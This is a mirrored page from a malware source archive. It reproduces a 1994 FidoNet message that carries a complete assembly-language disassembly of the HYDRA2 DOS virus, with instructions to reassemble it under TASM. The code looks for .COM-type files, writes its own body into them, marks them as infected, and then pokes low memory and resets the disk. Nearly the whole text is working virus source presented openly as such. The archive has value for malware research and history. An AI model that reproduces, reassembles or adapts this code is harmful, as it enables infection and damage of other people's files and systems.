mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
185 lines
5.9 KiB
NASM
185 lines
5.9 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 8 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : HYDRA_2.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:26)
|
||
;* To : Edwin Cleton
|
||
;* Subj : HYDRA_2.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org
|
||
PAGE 59,132
|
||
|
||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||
;ÛÛ ÛÛ
|
||
;ÛÛ HYDRA2 ÛÛ
|
||
;ÛÛ ÛÛ
|
||
;ÛÛ ÛÛ
|
||
;ÛÛ Disassembly by: -=>Wasp<=- aka >>Night Crawler<< ÛÛ
|
||
;ÛÛ ÛÛ
|
||
;ÛÛ Reassemble with TASM 2.0 ÛÛ
|
||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||
|
||
DATA_1E EQU 235H
|
||
DATA_2E EQU 522H
|
||
DATA_3E EQU 80H
|
||
DATA_13E EQU 157H
|
||
DATA_14E EQU 15AH
|
||
|
||
SEG_A SEGMENT BYTE PUBLIC
|
||
ASSUME CS:SEG_A, DS:SEG_A
|
||
|
||
|
||
ORG 100h
|
||
|
||
HYDRA2 PROC FAR
|
||
|
||
START:
|
||
JMP LOC_1 ; (0182)
|
||
DB 59H, 44H, 00H, 00H
|
||
DATA_5 DB 'HyDra-2 Beta - Not For Release'
|
||
DB '. *.CO?'
|
||
DB 0
|
||
DATA_8 DW 0, 84FCH
|
||
DATA_10 DW 0
|
||
DATA_11 DB 0
|
||
DB 29 DUP (0)
|
||
DATA_12 DB 0
|
||
DB 13 DUP (0)
|
||
COPYRIGHT DB 'Copyright (c)'
|
||
DB ' 1991 by C.A.V.E. '
|
||
LOC_1:
|
||
PUSH AX
|
||
MOV AX,CS
|
||
ADD AX,1000H
|
||
XOR DI,DI ; Zero register
|
||
MOV CX,157H
|
||
MOV SI,OFFSET DS:[100H]
|
||
MOV ES,AX
|
||
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
|
||
MOV AH,1AH
|
||
MOV DX,OFFSET DATA_11
|
||
INT 21H ; DOS Services ah=function 1Ah
|
||
; set DTA to ds:dx
|
||
MOV AH,4EH ; 'N'
|
||
MOV DX,OFFSET DATA_5+22H
|
||
INT 21H ; DOS Services ah=function 4Eh
|
||
; find 1st filenam match @ds:dx
|
||
JC LOC_5 ; Jump if carry Set
|
||
LOC_2:
|
||
MOV AH,3DH ; '='
|
||
MOV AL,2
|
||
MOV DX,OFFSET DATA_12
|
||
MOV AL,2
|
||
INT 21H ; DOS Services ah=function 3Dh
|
||
; open file, al=mode,name@ds:dx
|
||
MOV BX,AX
|
||
PUSH ES
|
||
POP DS
|
||
MOV AX,3F00H
|
||
MOV CX,0FFFFH
|
||
MOV DX,DATA_13E
|
||
INT 21H ; DOS Services ah=function 3Fh
|
||
; read file, cx=bytes, to ds:dx
|
||
ADD AX,157H
|
||
MOV CS:DATA_10,AX
|
||
CMP WORD PTR DS:DATA_14E,4459H
|
||
JNE LOC_3 ; Jump if not equal
|
||
MOV AH,3EH ; '>'
|
||
INT 21H ; DOS Services ah=function 3Eh
|
||
; close file, bx=file handle
|
||
PUSH CS
|
||
POP DS
|
||
MOV AH,4FH ; 'O'
|
||
INT 21H ; DOS Services ah=function 4Fh
|
||
; find next filename match
|
||
JC LOC_6 ; Jump if carry Set
|
||
JMP SHORT LOC_2 ; (01A4)
|
||
LOC_3:
|
||
XOR CX,CX ; Zero register
|
||
MOV DX,CX
|
||
MOV AX,4200H
|
||
INT 21H ; DOS Services ah=function 42h
|
||
; move file ptr, cx,dx=offset
|
||
JC LOC_4 ; Jump if carry Set
|
||
MOV AH,40H ; '@'
|
||
XOR DX,DX ; Zero register
|
||
MOV CX,CS:DATA_10
|
||
INT 21H ; DOS Services ah=function 40h
|
||
; write file cx=bytes, to ds:dx
|
||
LOC_4:
|
||
MOV AH,3EH ; '>'
|
||
INT 21H ; DOS Services ah=function 3Eh
|
||
; close file, bx=file handle
|
||
PUSH CS
|
||
POP DS
|
||
LOC_5:
|
||
MOV AH,1AH
|
||
MOV DX,DATA_3E
|
||
INT 21H ; DOS Services ah=function 1Ah
|
||
; set DTA to ds:dx
|
||
JMP SHORT LOC_7 ; (0218)
|
||
DB 90H
|
||
LOC_6:
|
||
PUSH DX
|
||
XOR AX,AX ; Zero register
|
||
XOR AX,AX ; Zero register
|
||
MOV DS,AX
|
||
MOV BX,DATA_2E
|
||
MOV AH,0FFH
|
||
MOV [BX],AH
|
||
XOR AX,AX ; Zero register
|
||
INT 13H ; Disk dl=drive 0 ah=func 00h
|
||
; reset disk, al=return status
|
||
MOV AX,0
|
||
INT 21H ; DOS Services ah=function 00h
|
||
; terminate, cs=progm seg prefx
|
||
LOC_7:
|
||
XOR DI,DI ; Zero register
|
||
MOV SI,DATA_1E
|
||
MOV CX,22H
|
||
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
|
||
POP BX
|
||
MOV CS:DATA_8,0
|
||
MOV WORD PTR CS:DATA_8+2,ES
|
||
POP BX
|
||
JMP DWORD PTR CS:DATA_8
|
||
DB 1EH, 07H,0B9H,0FFH,0FFH,0BEH
|
||
DB 57H, 02H,0BFH, 00H, 01H, 2BH
|
||
DB 0CEH,0F3H,0A4H, 2EH,0C7H, 06H
|
||
DB 00H, 01H, 00H, 01H, 2EH, 8CH
|
||
DB 1EH, 02H, 01H, 8BH,0C3H, 2EH
|
||
DB 0FFH, 2EH, 00H, 01H,0CDH
|
||
DB 20H
|
||
|
||
HYDRA2 ENDP
|
||
|
||
SEG_A ENDS
|
||
|
||
|
||
|
||
END START
|
||
|
||
;-+- Terminate 1.50/Pro
|
||
; + Origin: Miami Beach BBS - Nijmegen Nl - 080-732083 - ZyX 19K2 (2:283/718)
|
||
;=============================================================================
|
||
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/w0,/w1,/w2 Set warning level: w0=none, w1=w2=warnings on
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
;* Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|